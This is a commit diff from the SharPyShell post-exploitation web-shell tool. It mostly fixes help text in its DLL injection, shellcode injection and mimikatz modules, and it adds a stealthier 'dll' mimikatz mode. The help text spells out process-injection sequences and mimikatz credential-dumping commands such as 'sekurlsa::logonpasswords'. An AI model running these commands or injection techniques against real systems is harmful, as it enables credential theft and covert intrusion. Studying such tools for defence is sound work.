STRLCPY/SharPyShell

■ ■ ■ ■ ■ ■

core/config.py

1	1		import sys
2	2		import os
3	3
4		-	sharpyshell_version='1.1.10'
	4	+	sharpyshell_version='1.1.11'
5	5
6	6		header = '#SharPyShell v' + sharpyshell_version + ' - @splinter_code'
7	7		banner = """
		skipped 18 lines

■ ■ ■ ■ ■ ■

modules/inject_dll_reflective.py

		skipped 20 lines
21	21		The dll_path is a relative path to a dll that exists in the folder 'reflective_dll/'.
22	22		The dll must be compiled with the 'ReflectiveLoader' exported function otherwise it cannot be executed
23	23		at runtime.
24		-	You can use one of the following supported injection technique:
	24	+	You can use one of the following supported injection techniques:
25	25		- remote_virtual: classic injection:
26	26		VirtualAllocEx (RWX) -> WriteProcessMemory -> CreateRemoteThread
27	27		- remote_virtual_protect: with this technique you never allocate RWX memory (polymorphic encoders won't work):
		skipped 17 lines
45	45
46	46		Examples:
47	47		Inject a messagebox reflective DLL into an existing process:
48		-	#inject_dll_reflective messagebox_reflective_x64.dll 'remote_virtual' '2264'
	48	+	#inject_dll_reflective messagebox_reflective.dll remote_virtual 2264
49	49
50	50		"""
51	51
		skipped 26 lines

■ ■ ■ ■ ■ ■

modules/inject_dll_srdi.py

		skipped 228 lines
229	229
230	230
231	231		Inject a generic DLL into a remote process.
232		-	This module convert a generic DLL into a position independent Shellcode ready to be injected.
	232	+	This module converts a generic DLL into a position independent Shellcode ready to be injected.
233	233		You can choose to create a new process or use a pid of an existing process as a host process.
234	234		The dll_path is a relative path to a dll that exists in the folder 'dll/'.
235		-	You can use one of the following supported injection technique:
	235	+	You can use one of the following supported injection techniques:
236	236		- remote_virtual: classic injection:
237	237		VirtualAllocEx (RWX) -> WriteProcessMemory -> CreateRemoteThread
238	238		- remote_virtual_protect: with this technique you never allocate RWX memory (polymorphic encoders won't work):
		skipped 16 lines
255	255		Default: 'cmd.exe'
256	256
257	257		Examples:
258		-	?????????????????????????????????????????????????????????????????????????????????????????????????????
259		-	?????????????????????????????????????????????????????????????????????????????????????????????????????
	258	+	Convert a messagebox generic DLL in shellcode and inject into an existing process:
	259	+	#inject_dll_srdi messagebox_msf.dll remote_virtual 2264
260	260		"""
261	261
262	262		__default_exported_function_name = 0x10
		skipped 20 lines
283	283		with open(dll_path, 'rb') as file_handle:
284	284		dll_bin_byte_arr = bytearray(file_handle.read())
285	285		srdi_object = sRDI()
286		-	# user_data = '"log C:\\windows\\temp\\powerkatz_srdi.log" privilege::debug sekurlsa::logonpasswords exit\x00'.encode('utf-16-le')
287	286		if exported_function_name != 0x10:
288	287		exported_function_name = srdi_object.HashFunctionName(exported_function_name)
289	288		shellcode_bin_byte_arr = \
		skipped 14 lines

■ ■ ■ ■ ■ ■

modules/inject_shellcode.py

		skipped 12 lines
13	13		This module allow to inject your shellcode in a host process.
14	14		You can choose to create a new process or use a pid of an existing process as a host process.
15	15		If you create the payload for the shellcode from msfvenom ensure you use the flag --format raw.
16		-	You can use one of the following supported injection technique:
	16	+	You can use one of the following supported injection techniques:
17	17
18	18		- remote_virtual: classic injection:
19	19		VirtualAllocEx (RWX) -> WriteProcessMemory -> CreateRemoteThread
		skipped 282 lines

■ ■ ■ ■ ■ ■

modules/mimikatz.py

		skipped 24 lines
25	25
26	26
27	27		This module allows you to run mimikatz in a versatile way.
28		-	Within this module it is possible to run mimikatz in 2 different way:
	28	+	Within this module it is possible to run mimikatz in 3 different ways:
29	29		'ps1': an obfuscated ps1 module will be uploaded to the server and get deobfuscated at runtime in memory;
30		-	'exe': the classic mimikatz binary will be uploaded to the server and run with arguments.
	30	+	'exe': the classic mimikatz binary will be uploaded to the server and run with arguments;
	31	+	'dll': convert mimikatz dll into a position independent shellcode and inject into a remote process.
31	32		It is recommended to run the ps1 version because it will be obfuscated and run from memory.
32	33		The exe version will be just dropped as clear and could be catched by av scanners.
	34	+	The dll version is the most stealthy but it doesn't support impersonation atm.
33	35
34	36
35	37		Usage:
36	38		#mimikatz [exec_type] [username] [password] [domain] [custom_command]
37	39
38	40		Positional arguments:
39		-	exec_type type of running mimikatz.
40		-	'ps1' will upload and execute the powershell version of mimikatz
41		-	'exe' will upload and execute the classic version of binary mimikatz
	41	+	exec_type execution type for running mimikatz:
	42	+	'ps1' will upload and execute the powershell version of mimikatz
	43	+	'exe' will upload and execute the classic version of binary mimikatz
	44	+	'dll' will inject converted dll shellcode into a remote process
42	45		Default: 'ps1'
43	46		username username of the user to runas the process
44	47		password password of the user to runas the process
		skipped 1 lines
46	49		custom_command based on exec_type, the custom command could be:
47	50		- 'ps1' : powershell code to add to the ps1 mimikatz module;
48	51		- 'exe' : command line arguments to the mimikatz binary;
	52	+	- 'dll' : command line arguments to be executed.
49	53		Default:
50	54		'ps1': ';Invoke-Mimikatz -DumpCreds'
51	55		'exe': 'privilege::debug sekurlsa::logonpasswords exit'
	56	+	'dll': 'privilege::debug sekurlsa::logonpasswords exit'
52	57
53	58		Examples:
54	59		Run mimikatz as the current user
		skipped 105 lines

fixed help in injection modules